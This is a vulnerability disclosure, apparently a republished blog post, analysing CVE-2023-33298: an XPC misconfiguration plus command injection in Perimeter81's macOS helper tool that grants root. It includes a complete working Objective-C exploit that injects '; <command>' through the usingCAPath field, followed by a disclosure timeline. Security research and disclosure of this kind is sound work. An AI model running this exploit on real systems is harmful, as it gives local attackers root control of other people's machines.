CVE-2023-33298 – Perimeter81 Local Privilege Escalation

渗透技巧 1年前 (2023) admin
300 0 0

Table of Contents

Introduction

Today we will be analyzing CVE-2023-33298 which is Local Privilege Escalation inside the Perimeter81 macOS application. We will be exploiting XPC service misconfiguration along with the Command Injection vulnerability to gain root privileges.

Analysis

Perimeter81 adds an entry to LaunchDaemons, and we can examine the content of the com.perimeter81.osx.HelperTool.plist located inside /Library/LaunchDaemons/ directory.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationWe can see that the key for MachServices is dictionary containing com.perimeter81.osx.HelperTool. This is the name of mach service which is exposed by the com.perimeter81.osx.HelperTool binary.

If we now load /Library/PrivilegedHelperTools/com.perimeter81.osx.HelperTool inside the Hopper and search for xpc_connection_create_mach_service we can confirm that the function is called with com.perimeter81.osx.HelperTool as first argument.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationFrom the image, we can also see that it calls xpc_connection_set_event_handler with &var_40. We can read documentation and conlude that the structure contains isa pointer (which type of block is this), followed by two ints(flags and reserved) and finally void (*invoke)(void *, ...); function pointer which points to the actualy compiled block body.

Inside the disassembly, we can see that *(&var_40 + 0x10) = sub_1002169d7; points to sub_1002169d7. Let’s now examine this function.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationInside the else we can see another call to xpc_connection_set_event_handler with the block that has invoke pointer set to sub_100216a98. Double clicking on this sub shows the following code.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationBased on this function we can conclude the following:

  • We need to send the dictionary
  • type inside the dictionary needs to be rpc or helper_tool_rpc.
  • Function sub_100216d6c is called in multiple branches so we will check what that is
  • We can also see that we have a line r12 = xpc_dictionary_get_string(r13, "rpc"); followed by the check whether r12 is equal to start_connection so we can conclude that the key rpc will contain some kind of function what to do.

Inspecting the sub_100216d6c function shows that it calls -[SDHelperTool handleTargetServiceCommand:withRequest:withReply:].

CVE-2023-33298 - Perimeter81 Local Privilege EscalationSince this method is a bit bigger, we will show only the beginning and the end of the function which are interesting.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationWe can see that it tries to extract the parameters and target_service keys. If target_service is NULL, it jumps to loc_10020a119.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationWe can see that it saves @selector(generalInvoker) inside the rax register and then jumps back to loc_10020a1c0loc_10020a1c0 just calls handleXPCServiceCommand:withParameters:withReply.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationIf we search for “generalInvoker” in Hopper we can see that we have a match for -[SDHelperTool setup_GeneralInvoker] which allocates new object of class SDHelperTool_InvokerGeneral.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationSearching for DHelperTool_InvokerGeneral reveals a lot of methods. After digging around a bit, I have found install_SDP_CA:withReply: which calls security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain %@ with the value from dictionary under the key usingCAPath. This is typical command injection where we can simply append ; followed by the command we want to execute.

CVE-2023-33298 - Perimeter81 Local Privilege EscalationCVE-2023-33298 - Perimeter81 Local Privilege EscalationSo to recap, our exploit should do the following:

  • call xpc_connection_create_mach_service with com.perimeter81.osx.HelperTool as a name
  • create a dictionary for properties with the key usingCAPath and value as ; some command to run as root
  • create another dictionary that will be our message with type as helper_tool_rpcrpc as install_SDP_CA, and key parameters set to the previous dictionary
  • send the message

Full exploit

Full exploit looks like the following:

#import <Foundation/Foundation.h>

#define NAME "com.perimeter81.osx.HelperTool"

int main(int argc, const char **argv) {
    if (argc != 2) {
        printf("missing cmd to execute\n");
        exit(1);
    }

    xpc_connection_t conn = xpc_connection_create_mach_service(NAME, NULL, 0);
    xpc_connection_set_event_handler(conn, ^(xpc_object_t object){
        NSLog(@"client received event: %s", xpc_copy_description(object));
    });
    xpc_connection_resume(conn);

    const char *c = argv[1];

    char cmd[250];
    sprintf(cmd, "; %s", c);

    // create dictionary to hold our parameters
    // method name and its parameters
    xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(params, "usingCAPath", cmd);

    // create dictionary to send over xpc
    xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(message, "type", "helper_tool_rpc");
    xpc_dictionary_set_string(message, "rpc", "install_SDP_CA");
    xpc_dictionary_set_value(message, "parameters", params);

    xpc_connection_send_message_with_reply(conn, message, dispatch_get_main_queue(), ^(xpc_object_t object){
        NSLog(@"Executed cmd: \"%s\"\n", c);
    });


    // create run loop so we can get async result for our command, otherwise the exploit would exit after sending the 
    // message
    dispatch_main();

    return 0;
}

CVE-2023-33298 - Perimeter81 Local Privilege Escalation

Timeline

Date Action
17 March 2023 Sent report to Perimeter81
21th March 2023 Asked for an update, no reply
10th April 2023 Asked for an update once more, got response that it was wrongly sidetracked
19th April 2023 Sent mail to see whether they have investigated it and working on it
10th May 2023 Another mail and got no response
16th May 2023 Contacted VINCE to coordinate disclosure

VINCE tried to contact them multiple times without success, so after more than three months I have decided to disclose the vulnerability.

 

原文始发于NSEcho:CVE-2023-33298 – Perimeter81 Local Privilege Escalation

版权声明:admin 发表于 2023年7月3日 上午9:23。
转载请注明:CVE-2023-33298 – Perimeter81 Local Privilege Escalation | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...